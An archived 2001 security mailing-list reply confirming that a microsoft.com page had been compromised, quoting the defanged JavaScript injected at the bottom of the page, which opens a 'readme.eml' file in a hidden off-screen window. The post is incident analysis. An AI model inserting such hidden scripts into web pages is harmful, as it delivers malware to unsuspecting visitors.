Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Please tell me I'm wrong: microsoft.com infected

From: "Michael H. Warfield" <mhw () wittsend com>
Date: Wed, 19 Sep 2001 17:54:03 -0400
On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote:

I just went to http://www.microsoft.com/frontpage, and my Symantec
Norton Antivirus popped up and denied access to readme.eml.



I could not view the source of the loaded page, so I can't verify that
it is definitely infected.


        Yes, indeedie do.  Just did a wget http://www.microsoft.com/frontpage
and here is what's on da bottom:

[html][script language="JavaScript"]window.open("readme.eml", null, "resizable=no,top=6000,left=6000")[/script][/html]

        Defanged by turning angle brackets into square brackets even though
it's not in an html attachment.  ;-)


Steve


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com


-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw () WittsEnd com
  (The Mad Wizard)      |  (678) 463-0932   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: